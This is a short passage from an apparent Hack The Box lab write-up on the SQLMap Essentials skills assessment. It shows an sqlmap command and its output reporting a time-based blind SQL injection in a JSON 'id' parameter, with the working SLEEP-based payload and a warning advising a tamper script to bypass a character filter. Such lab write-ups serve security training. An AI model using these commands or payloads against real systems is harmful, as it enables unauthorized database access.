Collinformatics/HackTheBox/SkillsAssessment/SQLMap Essentials/writeup.md

 Now that the request file, has been made see if we can get an injection.

     sqlmap --threads=10 --batch -r request.txt --random-agent

+The scan reveals that the form is injectable.

+    ---
+    Parameter: JSON id ((custom) POST)
+        Type: time-based blind
+        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+        Payload: {"id":"1 AND (SELECT 2014 FROM (SELECT(SLEEP(5)))Bicq)"}
+    ---

+However we do also have this warning:

+    [WARNING] it appears that the character '>' is filtered by the back-end server.
+You are strongly advised to rerun with the '--tamper=between'